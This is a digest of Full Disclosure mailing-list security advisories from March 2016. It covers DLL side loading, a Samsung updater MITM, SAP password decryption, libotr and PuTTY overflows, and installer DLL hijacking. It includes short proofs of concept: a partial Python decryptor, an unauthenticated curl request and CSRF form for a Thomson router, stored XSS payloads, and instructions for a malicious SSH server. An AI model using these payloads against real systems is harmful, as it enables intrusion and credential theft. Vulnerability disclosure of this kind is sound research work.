Re: [FD] Windows Mail Find People DLL side loading vulnerability

2016-03-09 Thread Securify B.V. 

Hi Stefan,

See below.


On 09-03-16 12:48, Stefan Kanthak wrote:

"Securify B.V." wrote:



Windows Mail Find People DLL side loading vulnerability

Yorick Koster, September 2015

This vulnerability demonstrates Microsoft's terrible SLOPPY coding
horror^Wpractice: it needs two mistakes to create this kind of bug!

"%CommonProgramFiles%\System\wab32res.dll" is (as its name implies)
a resource DLL, which means that it contains no code, but only
(localized) resources, and SHOULD (better: MUST) be loaded via
 LoadLibraryEx("%CommonProgramFiles%\System\wab32res.dll", NULL, 
LOAD_LIBRARY_AS_DATAFILE)
to avoid the call of its DllMain() startup code!
See 

JFTR: LOAD_LIBRARY_AS_DATAFILE was introduced in the last millennium!

Either
 LoadLibrary("%CommonProgramFiles%\System\wab32res.dll")
or
 LoadLibraryEx("wab32res.dll", NULL, LOAD_LIBRARY_AS_DATAFILE)
were sufficient to avoid this vulnerability.



Fix

Microsoft released MS16-025 that fixes this vulnerability.

Have you checked how Microsoft fixed it?
Did they exercise all due diligence now, practised defense in depth
and replaced the call to
 LoadLibrary("wab32res.dll")
with a call to
 LoadLibraryEx("%CommonProgramFiles%\System\wab32res.dll", NULL, 
LOAD_LIBRARY_AS_DATAFILE)?


They still use LoadLibrary() to load wab32res.dll. Previously, the 
fetched a path from HKLM\Software\Microsoft\WAB\DLLPath and appended 
wab32res.dll to the result, which was fed into LoadLibrary().


With MS16-025 they sanitize DLLpath using PathRemoveFileSpec(). By 
default DLLPath is set to %CommonProgramFiles%\System\wab32.dll, 
PathRemoveFileSpec() removes wab32.dll from the path. They also call 
ExpandEnvironmentStrings(), but that was also the case previously.


With kind regards,

Yorick

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [CORE-2016-0003] - Samsung SW Update Tool MiTM

2016-03-09 Thread CORE Advisories Team 
1. Advisory Information

Title: Samsung SW Update Tool MiTM
Advisory ID: CORE-2016-0003
Advisory URL: http://www.coresecurity.com/advisories/samsung-sw-update-tool-mitm
Date published: 2016-03-07
Date of last update: 2016-03-04
Vendors contacted: Samsung
Release mode: Coordinated release

2. Vulnerability Information

Class: Cleartext Transmission of Sensitive Information [CWE-319], Insufficient 
Verification of Data Authenticity [CWE-345]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2

 

3. Vulnerability Description

The Samsung SW Update Tool [1] is a tool that analyzes the system drivers of a 
computer. You can install relevant software for your computer easier and faster 
using SW Update. The SW Update program helps you install and update your 
software and driver easily.

Samsung [2] SW Update Tool is prone to a Men in The Middle attack which could 
result in integrity corruption of the transferred data, information leak and 
consequently code execution.

4. Vulnerable Packages

Samsung SW Update Tool 2.2.5.16
Other products and versions might be affected too, but they were not tested.

5. Vendor Information, Solutions and Workarounds

Samsung published a fixed version of Samsung SW Update Tool on their website 
[1].

6. Credits

This vulnerability was discovered, researched and coordinated by Joaquin 
Rodriguez Varela from Core Security CoreLabs Team.

 

7. Technical Description / Proof of Concept Code

7.1. Clear text Transmission of Update Information

[CVE-pending-assignment-1] Depending on whether the tool runs on a Samsung 
machine or not the program behavior will be different. On some Samsung machines 
it detects automatically the model of hardware and therefore the hardware it 
uses, on other models or non-Samsung machines it requires the user to specify 
the model of machine they would like to download drivers for. Several requests 
are performed once one of this conditions is met, and eventually an XML file is 
required which will depend on the model detected/selected:

 
GET http://orcaservice.samsungmobile.com/dl/bom/MAX6356A04.XML HTTP/1.1
Host: orcaservice.samsungmobile.com
   
The name of the XML file is the model ID for which the drivers are being 
requested. In the XML file that is received from the server, there's a tag 
called 'FURL' that has the URL of the file that is going to be downloaded and 
executed by the application.

 



MAX6356A04


Nxxx-15xx
Nike-15R_BBY
MP100
MRT63

DNC
DONCR
DNC
ALL
2012-05-11 8:01:04
2012-05-11 8:01:04
Yes


BASW-83294A07
SOFTWARE
Win8-Realtek LAN Driver[Gigabit] 
8.4.907.2012-Dock_Dongle_isolate
DNC
W8PR32/W8SL32/W8ST32/W8PR64/W8SL64/W8ST64
DNC
ALL
PSTEXE
BASW-83294A\BASW-83294A07.ZIP
setup.exe
-s -f2c:\Setup.log
/pbr
10554011
5406352
C2P1
GCP
21090
SM1
ITMRQR
70
DrvVer

8.4.907.2012



Y



http://orcaservice.samsungmobile.com/FileDownloader.aspx?FILENAME=BASW-83294A07.ZIP

ENG

BRA
Driver de LAN


CZE
Ovladač sítě LAN


DAN
LAN-driver


DUT
LAN-stuurprogramma


ENG
LAN Driver
...
...
   
Once the application's search process comes to an end, it shows the user the 
available drivers updates. After downloading the drivers, depending on the 
functionality mode the software is working, the user can click on the 'Install' 
button and the binaries are executed (Function 1), or, if running on the 
"Function 2" mode, the location where the software was saved pops-up in order 
for the user to execute the downloaded file.

7.1.1. Insufficient Verification of Update Authenticity

[CVE-pending-assignment-2] There is no verification at all performed by the 
software itself over the downloaded files. There are some "control" parameters 
inside the XML file:

 
...
...
RegVer
HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\infInst
10.1.1.9
Version
...
...
   
But those "control" parameters can be easily disabled by manipulating the XML 
file:

 
...
...
NoVerify



...
...
   
An attacker can easily modify the returning XML file in order to achieve code 
execution on the victim's machine.

 

8. Report Timeline

2016-01-22: Core Security sent an initial notification to Samsung.

[FD] [CORE-2016-0004] - SAP Download Manager Password Weak Encryption

2016-03-09 Thread CORE Advisories Team 
1. Advisory Information

Title: SAP Download Manager Password Weak Encryption
Advisory ID: CORE-2016-0004
Advisory URL: 
http://www.coresecurity.com/advisories/sap-download-manager-password-weak-encryption
Date published: 2016-03-08
Date of last update: 2016-03-07
Vendors contacted: SAP
Release mode: Coordinated release

2. Vulnerability Information

Class: Storing Passwords in a Recoverable Format [CWE-257]
Impact: Information leak
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-pending-assignment

 

3. Vulnerability Description

SAP Download Manager [1] is a Java application offered by SAP that allows 
downloading software packages and support notes. This program stores the user's 
settings in a configuration file. Sensitive values, such as the proxy username 
and password if set, are stored encrypted using a fixed static key.

4. Vulnerable Packages

SAP Download Manager version up to 2.1.142 (released in October 2015)
Other products and versions might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

SAP published the following Security Note:

2282338
It can be accessed by SAP clients in their Support Portal [4].

An updated version of SAP Download Manager can be found in their website [1].

6. Credits

This vulnerability was discovered and researched by Martin Gallo from Core 
Security Consulting Services. The publication of this advisory was coordinated 
by Joaquín Rodríguez Varela from Core Advisories Team.

 

7. Technical Description / Proof of Concept Code

SAP Download Manager is a Java application offered by SAP that allows 
downloading software packages and support notes. This program stores the user's 
settings in a configuration file. Configuration settings are stored in a Java 
HashMap object, which is serialized using Java's standard mechanism before 
being read from the configuration file. The program implemented encrypted 
storage of sensitive values since version 2.1.140a (see SAP Security Note 
2074276 [2]). User's SAP Marketplace password is not stored in the 
configuration file since version 2.1.142 (see SAP Security Note 2235412 [3]). 
However, other sensitive values, such as the user's proxy password are stored 
encrypted.

Encryption is performed using a different mechanism according to the platform 
where the program is run:

On Windows and MacOS systems, the key is composed by the computer's BIOS serial 
number concatenated with a fixed key hard-coded in the program's code, up to 16 
bytes.
On other platforms, such as Linux, the key is only composed by a fixed key 
hard-coded in the program's code.
Additionally, a transformation is performed over the value to encrypt. The code 
that handles the encryption/decryption it's inside the program's 
"StringWrapper" class.

An attacker who manages to get access to a user's configuration file might be 
able to obtain the stored proxy password.

The following python script can be used as a proof of concept for retrieving 
the stored values from a configuration file:

 
#!/usr/bin/env python
# ===
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2016 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==

# Standard imports
from sys import platform
from struct import pack, unpack
from optparse import OptionParser
from subprocess import check_output
# pyCrypto import
try:
from Crypto.Cipher import AES
except ImportError:
AES = None


# Java serialization decoding. Taken from http://stackoverflow.com/a/16470856
def parse_java(f):
h = lambda s: ' '.join('%.2X' % ord(x) for x in s)  # format as hex
p = lambda s: sum(ord(x)*256**i for i, x in enumerate(reversed(s)))  # 
parse integer
magic = f.read(2)
assert magic == '\xAC\xED', h(magic)  # STREAM_MAGIC
assert p(f.read(2)) == 5  # STREAM_VERSION
handles = []

def parse_obj():
b = f.read(1)
if not b:
raise StopIteration  # not necessarily the best thing to throw here.
if b == '\x70':  # p TC_NULL
return None
elif b == '\x71':  # q TC_REFERENCE
handle = p(f.read(4)) - 0x7E  # baseWireHandle
o = handles[handle]
return o[1]
elif b == '\x74': # t TC_STRING
string = f.read(p(f.read(2))).decode('utf-8')
handles.append(('TC_STRING', stri

[FD] Advisory X41-2016-001: Memory Corruption Vulnerability in "libotr"

2016-03-09 Thread X41 D-Sec GmbH Advisories 

X41 D-Sec GmbH Security Advisory: X41-2016-001

Memory Corruption Vulnerability in "libotr"
===

Overview

Severity Rating: high
Confirmed Affected Version: 4.1.0 and below
Confirmed Patched Version: libotr 4.1.1
Vendor: OTR Development Team
Vendor URL: https://otr.cypherpunks.ca
Vendor Reference: OTR Security Advisory 2016-01
Vector: Remote
Credit: X41 D-Sec GmbH, Markus Vervier
Status: public
CVE: CVE-2016-2851
CVSS Score: 8.1 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2016-001-libotr/

Summary and Impact
--
A remote attacker may crash or execute arbitrary code in libotr by
sending large OTR messages.
While processing specially crafted messages, attacker controlled data on
the heap is written out of bounds.
No special user interaction or authorization is necessary in default
configurations.

Product Description
---
Off-the-Record (OTR) Messaging is a cryptographic protocol used in
well-known instant messaging clients such as Pidgin, ChatSecure, Adium
and others. It is designed to work on top of existing protocols and used
worldwide to provide secure communication in insecure environments.
OTR is regarded as highly secure and according to documents revealed by
Edward Snowden one of the protocols that the NSA is not able to decrypt
via cryptanalysis.
The most commonly used implementation of OTR is "libotr" which is a pure
C code implementation of the OTR protocol.

Analysis

During a manual code review X41 D-Sec GmbH discovered a remotely
exploitable vulnerability in libotr.

By sending large messages, an integer overflow can be triggered which
subsequently leads to a heap overflow on 64 bit architectures.

When a message of type OTRL_MSGSTATE_DATA is received during an
established OTR conversation, this message is passed to function
otrl_proto_accept_data in src/message.c line 1347:

case OTRL_MSGSTATE_ENCRYPTED:
extrakey = gcry_malloc_secure(OTRL_EXTRAKEY_BYTES);
err = otrl_proto_accept_data(&plaintext, &tlvs, context,
  message, &flags, extrakey);

After base64 decoding the message and reading various values from it,
the length of a payload is read into a variable of type "unsigned int"
in file proto.c line 784:

read_int(datalen);

It is checked that the message buffer will contain at least a "datalen"
number of bytes using read_int in proto.c line 785:

require_len(datalen);

The macros "read_int" and "required_len" are defined in src/serial.h:

#define require_len(l) do { \
if (lenp < (l)) goto invval; \
} while(0)

#define read_int(x) do { \
require_len(4); \
(x) = (((unsigned int)bufp[0]) << 24) | (bufp[1] << 16) | 
(bufp[2] <<
8) | bufp[3]; \
bufp += 4; lenp -= 4; \
} while(0)

4 bytes are read from the message buffer and interpreted as unsigned int
value.

Subsequently a buffer of size datalen+1 is allocated using malloc
in proto.c line 786:

data = malloc(datalen+1);
if (!data) {
err = gcry_error(GPG_ERR_ENOMEM);
goto err;
}

Now data from the message is copied into this buffer using memmove in
line 791:

memmove(data, bufp, datalen);

The vulnerability is triggered if a value of 0x (MAX_UINT) is
read from the message buffer. As datalen is of size 32-bit (unsigned
int) the operation "datalen+1" will wrap around before being passed to
malloc.
This will effectively result in a zero allocation ( malloc(0) ) which is
valid in common implementations of malloc on the x86_64 architecture.
As no addition is done in the value passed to the call to memmove, 4
gigabytes of data are copied out of bounds to the heap location pointed
to by data.

Proof of Concept

In order to successfully trigger the vulnerability, an attacker must be
able to send a data message of more than 5.5 gigabytes to a victim in
order to pass the check "require_len(datalen)".
Due to the support of fragmented OTR messages assembled by libotr this
is possible in practice. By sending 275 messages of size 20MB each, X41
was able to make libotr process such a data message successfully on a
system with 8GB of ram and 15GB of swap space.
As data types for lenp and other lengths of the message are 64 bit large
size_t types on x86_64 architectures huge messages of multiple gigabytes
are possible.
Sending such a message to a pidgin client took only a few minutes on a
fast network connection without visible signs of any attack to a user.

A proof of concept triggering a heap overwrite and crash in the
pidgin-otr plugin for the popular pidgin messenger on x86_64 Linux
architectures is available[1].

The crash occurs due to the overwrite hitting unmapped memory. Using
techniques such as heap grooming, X41 was able to inflate the heap to
mo

[FD] CVE-2016-2563 - PuTTY/PSCP <=0.66 buffer overflow - vuln-pscp-sink-sscanf

2016-03-09 Thread oststrom (public) 
A potential addition to your honeypots.


Author: 
Ref:
https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563
Version:0.1
Date:   Feb 20th, 2016

Tag:putty pscp client-side post-auth stack buffer overwrite when
processing remote file size 

Overview


Name:   putty
Vendor: sgtatham
References: * http://www.chiark.greenend.org.uk/~sgtatham/putty/ [1]

Version:0.66 [2]
Latest Version: 0.66
Other Versions: 0.59 [3] (~9 years ago) <= affected <= 0.66
Platform(s):win/nix
Technology: c

Vuln Classes:   stack buffer overwrite (CWE-121)
Origin: remote
Min. Privs.:post auth

CVE:CVE-2016-2563



Description
---

quote website [1]

>PuTTY is a free implementation of SSH and Telnet for Windows and Unix
platforms, along with an xterm terminal emulator. It is written and
maintained primarily by Simon Tatham.


Summary 
---

The putty SCP command-line utility (pscp) is missing a bounds-check for a
stack
buffer when processing the SCP-SINK file-size response to a SCP download
request. 
This may allow a malicious server to overwrite the stack buffer within the
client-
application potentially leading to remote code execution.

PoC see ref github.
Patch see ref github.


Besides that, two minor issues have been reported in putty packet handling:

* DoS condition in the parsing of SSH-Strings that lead to a nullptr read.
(connect putty to `poc.py` and type `x11exploit` to trigger one occurrence
of a crash, also works with x11forwarding disabled in putty)
* DoS condition in the handling of unrequested forwarded-tcpip channels open
requests that lead to a nullptr read. (connect putty to `poc.py` and type
`forwardedtcpipcrash` to trigger crash)

Details
---

The vulnerable code is located in `pscp.c` [4] line 1498 (HEAD) and is based
on an
unbound `sscanf` string format descriptor storing an arbitrary length string
in
a 40byte fixed size stack buffer `sizestr[40]`.

Inline annotations are prefixed with `//#!`

1491 /*
1492  * If we get here, we must have seen SCP_SINK_FILE or
1493  * SCP_SINK_DIR.
1494  */
1495 {
1496 char sizestr[40];
//#! fixed size buffer
1497 
1498 if (sscanf(act->buf, "%lo %s %n", &act->permissions,   //#!
unbound cstr %s written to sizestr
1499sizestr, &i) != 2)



Proof of Concept


Prerequisites: 

* install python 2.7.x
* issue `#> pip install paramiko` to install `paramiko` ssh library for
python 2.x
* make sure `poc.py` and `test_rsa.key` are in the same folder

poc:

Usage:   []
Default:  0.0.0.0:22

1. start the malicious sshd by running `poc.py` which by default will bind
all ips, port 22.

INFO monkey-patch paramiko.Transport.open_channel
INFO monkey-patch paramiko.Transport._check_banner
INFO --start--
INFO ServerHostKey: 60733844cb5186657fdedaa22b5a57d5
INFO BIND: ('0.0.0.0', 22)
INFO Listening for connection ...
...

2. try to retrieve any file from the malicious sshd by executing `pscp`.
Provide any user/password/pubkey, the server will just accept anything.

c:\> pscp.exe -scp root@localhost:/etc/passwd .
root@localhost's password: anything

3. key-exchange and authentication

...
INFO new peer: ('127.0.0.1', 6127)
DEBUGstarting thread (server mode): 0x2411750L
INFO Connected (version 2.0, client PuTTY_Release_0.66)
DEBUGkex algos:[u'diffie-hellman-group-exchange-sha256',
u'diffie-hellman-group-exchange-sha1', u'diffie-hellman-group14-sha1',
u'diffie-hellman-group1-sha1', u'rsa2048-sha256', u'rsa1024-sha1'] server
key:[u'ssh-rsa', u'ssh-dss'] client encrypt:[u'aes256-ctr', u'aes256-cbc',
u'rijndael-...@lysator.liu.se', u'aes192-ctr', u'aes192-cbc', u'aes128-ctr',
u'aes128-cbc', u'blowfish-ctr', u'blowfish-cbc', u'3des-ctr', u'3des-cbc',
u'arcfour256', u'arcfour128'] server encrypt:[u'aes256-ctr', u'aes256-cbc',
u'rijndael-...@lysator.liu.se', u'aes192-ctr', u'aes192-cbc', u'aes128-ctr',
u'aes128-cbc', u'blowfish-ctr', u'blowfish-cbc', u'3des-ctr', u'3des-cbc',
u'arcfour256', u'arcfour128'] client mac:[u'hmac-sha2-256', u'hmac-sha1',
u'hmac-sha1-96', u'hmac-md5'] server mac:[u'hmac-sha2-256', u'hmac-sha1',
u'hmac-sha1-96', u'hmac-md5'] client compress:[u'none', u'zlib'] server
compress:[u'none', u'zlib'] client lang:[u''] server lang:[u''] kex
follows?False
DEBUGCiphers agreed: local=aes256-ctr, remote=aes256-ctr
DEBUGusing kex diffie-hellman-group14-sha1; server key type ssh-rsa;
cipher: local aes256-ctr, remote aes256-ctr; mac: local hmac-sha1, remote
hmac-sha1; compression: local none, remote none
DEBUGSwitch to new keys ...
DEBUGAuth request (type=none) service=ssh-connection, username=root
INFO Auth rejected (none).
INFO REQUEST: allowed auths:
gssapi-keyex,gssapi-with-mic,password,publickey
DEBUGAuth request (type=gssapi-with-mic) service=ssh-connection,
username=root
INFO

[FD] New Security Tool: MrLooquer - IPv6 Intelligence

2016-03-09 Thread Rafa Sanchez 
Dear colleagues,

Please, allow us to introduce MrLooquer -> https://www.mrlooquer.com

MrLooquer combines open source intelligence techniques with heuristic and
data mining to perform one of the first attempts to create a real map about
IPv6 deployment and its relationship with current networks and protocols.

MrLooquer is born as an open initiative with Creative Commons license
focused on:
- Data discovery
- Visual intelligence
- Relationship

Our main goal is to provide a useful tool for security analysts around the
world. MrLooquer allows users to make advanced queries through our big data
infrastructure to obtain datasets with relationships between domains, IPv4,
IPv6, service informations, geolocation, etc...

We've released the first version recently. It's just the bread and
butter... We are developing a roadmap that includes, among other things,
 threat indicator based on relationships and patterns.

Please, feel free to start using it and we would be thankful for any type
of feedback.

Best regards,
MrLooquer team.

Web: https://www.mrlooquer.com
Twitter: https://twitter.com/mrlooquer
Blog: http://blog.mrlooquer.com/

security focus - pen-t...@securityfocus.com
ipv6 hackers - ipv6hack...@lists.si6networks.com
full disclosure - fulldisclosure@seclists.org

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Thomson TWG850 Wireless Router Multiple Vulnerabilities

2016-03-09 Thread Sebastian Perez 
[System Affected]
Thomson Router
HW Revision 2.0
VENDOR Thomson
BOOT Revision 2.1.7i
MODEL TWG850-4U
Software Version ST9D.01.09
Serial Number 00939902404041
Firmware Name TWG850-4U-9D.01.09-100528-S-001.bin

[Vulnerabilities]
1- Cross-Site Request Forgery
2- Unauthenticated access to resources
3- Persistent Cross-Site Scripting

[Advisory Timeline]
06-Jan-2016 - Vendor contacted through the website
11-Jan-2016 - Email sent to vendor
09-Mar-2016 - Public Disclosure

[Description of Vulnerabilities]
1- Cross-Site Request Forgery
An attacker who lures a TWG850-4U user (authenticated or unauthenticated)
to browse a malicious website can exploit cross site request forgery (CSRF)
to submit commands to the wireless router and gain control of the product.
The attacker could submit variety of commands including but not limited to
changing the admin account password, the network settings, etc.
All the application is vulnerable, for example it is possible to:
Change user/password & Factory Reset
- http:///goform/RgSecurity
Change wireless settings
- http:///goform/wlanPrimaryNetwork
Restore a backup
- http:///goform/RgBackupRestore
Enable/Disable Advanced Options
- http:///goform/RgOptions
Store a XSS
- http:///goform/RgTime

[PoC for Change user/password]


http://192.168.0.1/goform/RgSecurity"; method="POST">









2- Unauthenticated access to resources
It is possible to perform actions within the router configuration without
being authenticated; it's only required to know the proper urls and
parameters. For example it is possible to:

Wireless name and password in plain text
- http:///GatewaySettings.bin
Restore a backup
- http:///goform/RgBackupRestore
Change Advanced Options
- http:///goform/RgOptions
Store a XSS
- http:///goform/RgTime
Change user/password & Factory Reset
- http:///goform/RgSecurity
Change Wireless name and password
- http:///goform/wlanPrimaryNetwork

[PoC for Change Wireless name and password]
curl -i -s -k -X 'POST' -H 'Content-Type:
application/x-www-form-urlencoded' --data-binary
$'PrimaryNetworkEnable=1&ServiceSetIdentifier=&ClosedNetwork=0&WpaPskAuth=1&Wpa2PskAuth=1&WpaEncryption=3&WpaPreSharedKey=&ShowWpaKey=0x01&WpaRekeyInterval=0&GenerateWepKeys=0&WepKeysGenerated=0&displayPrimaryROMsg=0&commitwlanPrimaryNetwork=1'
'http:///goform/wlanPrimaryNetwork'

3- Persistent Cross-Site Scripting
Two instances of an store Cross-Site scripting were found within the router
web interface.
- http:///goform/RgTime [TimeServer1 Parameter]
- http:///goform/RgTime [TimeServer2 Parameter]
- http:///goform/RgTime [TimeServer3 Parameter]
- http:///goform/RgUrlBlock [BasicParentalNewKeyword Parameter]

[PoC #1]
POST /goform/RgTime HTTP/1.1
<..>

TimeSntpDisable=2&TimeServer1=clock.via.net&TimeServer2=ntp.nasa.gov
&TimeServer3=%22%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&TimeZoneOffsetHrs=0&TimeZoneOffsetMins=0&ResetSntpDefaults=

[PoC #2]
POST /goform/RgUrlBlock HTTP/1.1
<..>

BasicParentalNewKeyword=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&BasicParentalKeywordAction=1&BasicParentalNewDomain=&BasicParentalDomainAction=0

S3ba
@s3bap3
http://linkedin.com/in/s3bap3

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Netgear GS105Ev2 - Multiple Vulnerabilities

2016-03-09 Thread Benedikt Westermann 
Hi Nick,

> The Netgear website [1] shows that a new version of the firmware was 
> released 2 days after your FD post - version 1.4.0.6.
> The release notes [2] for the new version don't refer to these 
> security issues in any way (instead they mention three fairly 
> minor-sounding bugs fixed).

>> Firmware version: 1.3.0.3,1.4.0.2
>> Status: unfixed

Status remains the same. The vulnerabilities are also valid for the new version 
1.4.0.6. I checked it and could still reproduce the password-reset, the XSS, 
the CSRF, and the found also the cookie mentioned in the report after login. 
So,  nothing has changed with respect to the vulnerabilities.

Regards,
Benedikt


smime.p7s
Description: S/MIME cryptographic signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Security contact @ Gigabyte

2016-03-09 Thread Gustavo Sorondo 
Hi list,

I'd like to know if anyone here know someone working on security at
Gigabyte (http://www.gigabyte.com/), since we are trying to responsibly
report a high risk security flaw we found.

We opened a ticket asking to be contacted by their security team, and the
answer we got was:

"Thanks for your interest, but we already have a security team for our
websites. Regards, GIGABYTE" (sigh)

So, if any of you knows someone in there, please let us know.

Thanks!

Gus.-

--
Ing. Gustavo M. Sorondo
Cinta Infinita - CTO
Web: http://cintainfinita.com
LinkedIn: https://www.linkedin.com/in/gustavosorondo
GPG: http://www.cintainfinita.com/gpg/gs-pkey.txt

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Open Vulnerablity ID tracker instead of CVE. Maybe

2016-03-09 Thread op7ic \x00 
Hello List,

I`m growing a bit tired of the way MITRE assigns CVEs (or just ignores you)
so instead, I thought some unmoderated list would be easier to manage. I
opted out to keep the same format as CVE with exception of first three
letters.

https://www.freeovi.com

Its completly unmoderated generator so feel free to use it and suggest
improvements.

Thanks

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Windows Mail Find People DLL side loading vulnerability

2016-03-09 Thread Stefan Kanthak 
"Securify B.V." wrote:

> 
> Windows Mail Find People DLL side loading vulnerability
> 
> Yorick Koster, September 2015

[...]

> - CVE-2016-0100
> - MS16-025: Security Update for Windows Library Loading to Address
> Remote Code Execution (3140709)
> 
> 
> Tested versions
> 
> This issue was successfully verified on Windows Vista + Office 2010
> 32-bit.

This vulnerability demonstrates Microsoft's terrible SLOPPY coding
horror^Wpractice: it needs two mistakes to create this kind of bug!

"%CommonProgramFiles%\System\wab32res.dll" is (as its name implies)
a resource DLL, which means that it contains no code, but only
(localized) resources, and SHOULD (better: MUST) be loaded via
LoadLibraryEx("%CommonProgramFiles%\System\wab32res.dll", NULL, 
LOAD_LIBRARY_AS_DATAFILE)
to avoid the call of its DllMain() startup code!
See 

JFTR: LOAD_LIBRARY_AS_DATAFILE was introduced in the last millennium!

Either
LoadLibrary("%CommonProgramFiles%\System\wab32res.dll")
or
LoadLibraryEx("wab32res.dll", NULL, LOAD_LIBRARY_AS_DATAFILE)
were sufficient to avoid this vulnerability.

> 
> Fix
> 
> Microsoft released MS16-025 that fixes this vulnerability.

Have you checked how Microsoft fixed it?
Did they exercise all due diligence now, practised defense in depth
and replaced the call to
LoadLibrary("wab32res.dll")
with a call to
LoadLibraryEx("%CommonProgramFiles%\System\wab32res.dll", NULL, 
LOAD_LIBRARY_AS_DATAFILE)?

> 
> Details
> 
> https://www.securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html


regards
Stefan

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Executable installers are vulnerable^WEVIL (case 30): clamwin-0.99-setup.exe allows arbitrary (remote) code execution WITH escalation of privilege

2016-03-09 Thread Stefan Kanthak 
Hi @ll,

the executable installer clamwin-0.99-setup.exe (available from
) loads and executes DWMAPI.dll
or UXTheme.dll from its "application directory".


For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
,

and  for
"prior art" about this well-known and well-documented vulnerability.


If an attacker places one of the above named DLL in the user's
"Downloads" directory (for example per "drive-by download"
or "social engineering") this vulnerability becomes a remote
code execution.


Proof of concept/demonstration:
~~~

1. visit , download
   , save it
   as UXTheme.dll in your "Downloads" directory, then copy it as
   DWMAPI.dll;

2. download clamwin-0.99-setup.exe and save it in your "Downloads"
   directory;

3. execute clamwin-0.99-setup.exe from your "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in
   step 1.

PWNED!


See ,
 and
 plus
 and
 for details about
this well-known and well-documented BEGINNER'S error!  


stay tuned
Stefan Kanthak


PS: I really LOVE (security) software with such trivial beginner's
errors. It's a tell-tale sign to stay away from this snakeoil!


Timeline:
~

2016-03-06sent vulnerability report to authors

: host aspmx.l.google.com[64.233.184.26] said: 550-5.1.1
The email account that you tried to reach does not exist. Please try
550-5.1.1 double-checking the recipient's email address for typos or
550-5.1.1 unnecessary spaces. Learn more at 550 5.1.1
https://support.google.com/mail/answer/6596 y186si9894139wmy.43 - gsmtp (in
reply to RCPT TO command)

: host mx.sourceforge.net[216.34.181.68] said: 550 unknown user
(in reply to RCPT TO command)

2016-03-06report published

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Executable installers are vulnerable^WEVIL (case 31): MalwareBytes' installers allows arbitrary (remote) code execution WITH escalation of privilege

2016-03-09 Thread Stefan Kanthak 
Hi @ll,

Malwarebytes executable installers mbam-setup-2.2.0.1024.exe
and mbae-setup-1.08.1.1189.exe (available from
 and
) load
and execute UXTheme.dll and DWMAPI.dll from their "application
directory".

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
,

and 


If an attacker places UXTheme.dll and/or DWMAPI.dll in the user's
"Downloads" directory, for example per "drive-by download" or
"social engineering", this vulnerability becomes a remote code
execution.

Due to the application manifest embedded in the executables which
specifies "requireAdministrator" the executable installers are run
with administrative privileges ("protected" administrators are
prompted for consent, unprivileged standard users are prompted for
an administrator password); execution of the DLLs therefore results
in an escalation of privilege!


Proof of concept/demonstration:
~~~

1. visit , download
   , save it
   as UXTheme.dll in your "Downloads" directory, then copy it as
   DWMAPI.dll;

2. download mbam-setup-2.2.0.1024.exe and mbae-setup-1.08.1.1189.exe
   and save them in your "Downloads" directory;

3. execute mbam-setup-2.2.0.1024.exe and mbae-setup-1.08.1.1189.exe
   from your "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in step 1.

PWNED!


See ,
 and
http://seclists.org/fulldisclosure/2015/Dec/33 plus
 and
 for details about
this well-known and well-documented BEGINNER'S error!


regards
Stefan Kanthak


PS: I really LOVE (security) software with such trivial beginner's
errors. It's a tell-tale sign to stay away from this snakeoil!


Timeline:
~

2015-12-25sent report regarding MBAM to vendor

2015-12-25automatic reply from vendor:
  "We have received your request and an agent will respond
   to your ticket in the order in which it was received."

2016-01-03reply from vendor:
  "We'll take this into consideration for a near-future
   installer revamp."

2016-02-02requested status update

  NO REPLY, not even an acknowledgement of receipt

2016-02-02sent notice to Marcin Kleczynski after his public
  announcement of a bug bounty program

2016-02-02reply from Marcin Kleczynski:
  "I'm copying Pedro Bustamante who organizes our bug
   bounty program to take a look."

  NO reply from Pedro Bustamante et.al.

2016-02-12sent report regarding MBAE to vendor

  NO REPLY, not even an acknowledgement of receipt

2016-02-22resent report regarding MBAE to vendor

  NO REPLY, not even an acknowledgement of receipt

2016-03-06report published in accordance with my disclosure
  policy 

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

